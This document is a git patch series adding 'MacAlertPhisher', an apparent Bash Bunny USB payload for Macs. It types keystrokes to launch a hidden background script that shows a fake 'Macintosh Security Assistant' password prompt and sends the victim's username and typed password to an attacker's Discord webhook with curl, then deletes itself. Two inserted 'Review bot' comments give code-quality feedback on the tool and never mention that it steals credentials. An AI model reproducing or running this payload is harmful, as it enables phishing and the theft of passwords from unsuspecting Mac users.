From 133f6d94aa62217d127a9580d750c99062ac9c5a Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Fri, 28 Jul 2023 23:00:19 +0200 Subject: [PATCH 1/3] Add MacAlertPhisher --- .../phishing/MacAlertPhisher/README.md | 20 +++++++++++ .../phishing/MacAlertPhisher/payload.txt | 36 +++++++++++++++++++ .../phishing/MacAlertPhisher/script.sh | 33 +++++++++++++++++ 3 files changed, 89 insertions(+) create mode 100644 payloads/library/phishing/MacAlertPhisher/README.md create mode 100644 payloads/library/phishing/MacAlertPhisher/payload.txt create mode 100644 payloads/library/phishing/MacAlertPhisher/script.sh diff --git a/payloads/library/phishing/MacAlertPhisher/README.md b/payloads/library/phishing/MacAlertPhisher/README.md new file mode 100644 index 000000000..8d165c104 --- /dev/null +++ b/payloads/library/phishing/MacAlertPhisher/README.md @@ -0,0 +1,20 @@ +# MacAlertPhisher +* Author: 90N45 +* Version: 1.0 +* Target: Mac +* Attackmodes: HID, STORAGE + +### Description +Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny. + +### Setup +Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. + +### Status +| LED | State | +| --- | --- | +| Magenta solid (SETUP) | Set ATTACKMODE | +| Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine | +| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) | + +*Average runtime: 26 seconds* \ No newline at end of file diff --git a/payloads/library/phishing/MacAlertPhisher/payload.txt b/payloads/library/phishing/MacAlertPhisher/payload.txt new file mode 100644 index 000000000..532527b11 --- /dev/null +++ b/payloads/library/phishing/MacAlertPhisher/payload.txt 
@@ -0,0 +1,36 @@ +#!/bin/bash +# +# Title: MacAlertPhisher +# Description: Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny. +# Author: 90N45 +# Version: 1.0 +# Category: Phishing +# Attackmodes: HID, STORAGE + +LED SETUP +ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE + +LED ATTACK +QUACK GUI SPACE +QUACK DELAY 1000 +QUACK STRING terminal +QUACK ENTER +QUACK DELAY 2500 + +QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/script.sh /tmp/script.sh" +QUACK ENTER +QUACK DELAY 1000 + +QUACK STRING "diskutil eject /Volumes/BashBunny/" +QUACK ENTER +QUACK STRING "chmod +x /tmp/script.sh && nohup bash /tmp/script.sh &> /dev/null &" +QUACK ENTER +QUACK GUI SPACE +QUACK DELAY 1500 +QUACK STRING terminal +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "killall Terminal" +QUACK ENTER + +LED FINISH \ No newline at end of file diff --git a/payloads/library/phishing/MacAlertPhisher/script.sh b/payloads/library/phishing/MacAlertPhisher/script.sh new file mode 100644 index 000000000..7816c7873 --- /dev/null +++ b/payloads/library/phishing/MacAlertPhisher/script.sh 
@@ -0,0 +1,33 @@ +#!/bin/bash + +# Discord Webhook Link (NEEDED) +discord="" +# The alert's text +dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are a human." +# The alert's icon (for ex. "stop", "caution", "note" or a custom path to an icon) +icon="stop" +# A custom application, that should open the alert (for ex. "Finder") +app="" +# Base64 encode the entered string to prevent an injection/syntax error +base64=false + +#### The main script + +if [[ ${app} != "" ]]; then + pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer') +elif [[ ${app} == "" ]]; then + pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer') +fi + + +pwd=${pwd#*"button returned:Continue, text returned:"} + +if [[ ${base64} == true ]]; then + pwd=$(echo $pwd | base64) + curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something (Base64 encoded): ${pwd}\"}" ${discord} +else + curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something: ${pwd}\"}" ${discord} +fi + +# Self destruct +rm /tmp/script.sh \ No newline at end of file From 491e467ca03875467f1f0b8e1656fc199cc82e4e Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Mon, 31 Jul 2023 23:15:28 +0200 Subject: [PATCH 2/3] Add alert title + optional internet check --- .../phishing/MacAlertPhisher/README.md | 4 +- .../phishing/MacAlertPhisher/payload.txt | 5 +- .../phishing/MacAlertPhisher/script.sh | 59 ++++++++++++++++--- 3 files changed, 56 insertions(+), 12 deletions(-) 
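Review bot: The `elif [[ ${app} == "" ]]` branch in the main section is exactly the negation of the preceding `if [[ ${app} != "" ]]` test, so it should be a plain `else`; as written a reader has to evaluate both conditions to see that a dialog is always displayed. The value assigned to `discord` is a write-capable secret that this file carries in cleartext and hands to `curl` as a command-line argument, so anyone who reads the script from disk or lists the running curl process can recover the URL and post to that webhook; the `# Discord Webhook Link (NEEDED)` comment should state that exposure, e.g. `# Discord Webhook Link (NEEDED) — stored and passed in cleartext; anyone who reads this file or the curl argv can post to it`. Both `osascript` calls also splice `${dialog}`, `${icon}` and `${app}` directly into AppleScript source, so a double quote in any of those settings yields a script error rather than text, which is worth a one-line caveat above the configuration variables.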
diff --git a/payloads/library/phishing/MacAlertPhisher/README.md b/payloads/library/phishing/MacAlertPhisher/README.md index 8d165c104..cf08e0c1e 100644 --- a/payloads/library/phishing/MacAlertPhisher/README.md +++ b/payloads/library/phishing/MacAlertPhisher/README.md @@ -8,7 +8,7 @@ Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny. ### Setup -Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. +Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. Optional, you can change the other variables at the top of the `script.sh` file to your needs. ### Status | LED | State | @@ -17,4 +17,4 @@ Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/ar | Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine | | Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) | -*Average runtime: 26 seconds* \ No newline at end of file +*Average runtime: 27 seconds* \ No newline at end of file diff --git a/payloads/library/phishing/MacAlertPhisher/payload.txt b/payloads/library/phishing/MacAlertPhisher/payload.txt index 532527b11..615bd1204 100644 --- a/payloads/library/phishing/MacAlertPhisher/payload.txt +++ b/payloads/library/phishing/MacAlertPhisher/payload.txt @@ -25,11 +25,12 @@ QUACK STRING "diskutil eject /Volumes/BashBunny/" QUACK ENTER QUACK STRING "chmod +x /tmp/script.sh && nohup bash /tmp/script.sh &> /dev/null &" QUACK ENTER +QUACK DELAY 2000 QUACK GUI SPACE -QUACK DELAY 1500 +QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER -QUACK DELAY 500 +QUACK DELAY 1000 QUACK STRING "killall Terminal" QUACK ENTER 
diff --git a/payloads/library/phishing/MacAlertPhisher/script.sh b/payloads/library/phishing/MacAlertPhisher/script.sh index 7816c7873..7a3070318 100644 --- a/payloads/library/phishing/MacAlertPhisher/script.sh +++ b/payloads/library/phishing/MacAlertPhisher/script.sh 
@@ -2,32 +2,75 @@ # Discord Webhook Link (NEEDED) discord="" +# The alert's title +title="Macintosh Security Assistant" # The alert's text -dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are a human." -# The alert's icon (for ex. "stop", "caution", "note" or a custom path to an icon) +dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are the owner." +# The alert's icon (for ex. "stop", "caution", "note") icon="stop" # A custom application, that should open the alert (for ex. "Finder") app="" -# Base64 encode the entered string to prevent an injection/syntax error +# Base64 encode the entered string to prevent an injection/error base64=false +# Check if an internet connection is available and wait until it is before trying to send the Discord message +internet_check=false #### The main script +date=$(date) +user=$(whoami) + if [[ ${app} != "" ]]; then - pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer') + pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer') elif [[ ${app} == "" ]]; then - pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer') + pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer') fi - pwd=${pwd#*"button returned:Continue, text returned:"} if [[ ${base64} == true ]]; then pwd=$(echo $pwd | base64) - curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something (Base64 encoded): 
${pwd}\"}" ${discord} + enc_txt="(Base64)" else - curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something: ${pwd}\"}" ${discord} + enc_txt="" +fi + +# Discord Embed Message +embed="{ + \"embeds\": [ + { + \"color\": 14427938, + \"footer\": { + \"text\": \"Captured: ${date}\" + }, + \"author\": { + \"name\": \"Bash Bunny • MacAlertPhisher\", + \"url\": \"https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/phishing/MacAlertPhisher\", + \"icon_url\": \"https://www.gitbook.com/cdn-cgi/image/width=40,dpr=2,height=40,fit=contain,format=auto/https%3A%2F%2F3076592524-files.gitbook.io%2F~%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FnxJgJ9UdPfrcuL1U8DpL%252Ficon%252F1UaEKnAJMPWZDBVtU8Il%252Fbb.png%3Falt%3Dmedia%26token%3D43bf1669-462c-4295-b30b-94c295470371\" + }, + \"fields\": [ + { + \"name\": \"Current User\", + \"value\": \"${user}\", + \"inline\": true + }, + { + \"name\": \"Entered Credentials ${enc_txt}\", + \"value\": \"${pwd}\", + \"inline\": true + } + ] + } + ] +}" + +if [[ ${internet_check} == true ]]; then + while [[ $(ping -c1 google.com | grep -c "1 packets received") != "1" ]]; do + sleep 5 + done fi +curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "${embed}" ${discord} + # Self destruct rm /tmp/script.sh \ No newline at end of file From 0750db3a35ef72b79a29dc1c7a8d4236bbb0d471 Mon Sep 17 00:00:00 2001 From: 90N45 <79598596+90N45-d3v@users.noreply.github.com> Date: Mon, 31 Jul 2023 23:35:31 +0200 Subject: [PATCH 3/3] Add pictures to README.md --- payloads/library/phishing/MacAlertPhisher/README.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/payloads/library/phishing/MacAlertPhisher/README.md b/payloads/library/phishing/MacAlertPhisher/README.md index cf08e0c1e..3b8c03ebe 100644 --- a/payloads/library/phishing/MacAlertPhisher/README.md 
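Review bot: The `internet_check` loop added before the curl call has no upper bound: with `internet_check=true` it reissues `ping -c1 google.com` every 5 s until a reply arrives, and because payload.txt starts this script under `nohup`, a machine that never regains connectivity keeps a background bash process and a periodic ICMP/DNS request going indefinitely and never reaches the `rm /tmp/script.sh` line. The exit test also depends on the literal phrase `1 packets received` in macOS ping output, so any other ping implementation would loop forever even when online. The `# Check if an internet connection is available ...` comment should record both facts, e.g. `# Unbounded: retries every 5 s until one ICMP echo to google.com is answered; the match relies on macOS ping output`. The hunk begins at the file's second line, so the shebang line is outside it.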
+++ b/payloads/library/phishing/MacAlertPhisher/README.md @@ -7,6 +7,10 @@ ### Description Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny. +MAcAlertPhisher_alert_preview +
+MacAlertPhisher_message_preview + ### Setup Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. Optional, you can change the other variables at the top of the `script.sh` file to your needs. @@ -17,4 +21,4 @@ Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/ar | Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine | | Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) | -*Average runtime: 27 seconds* \ No newline at end of file +*Average runtime: 27 seconds*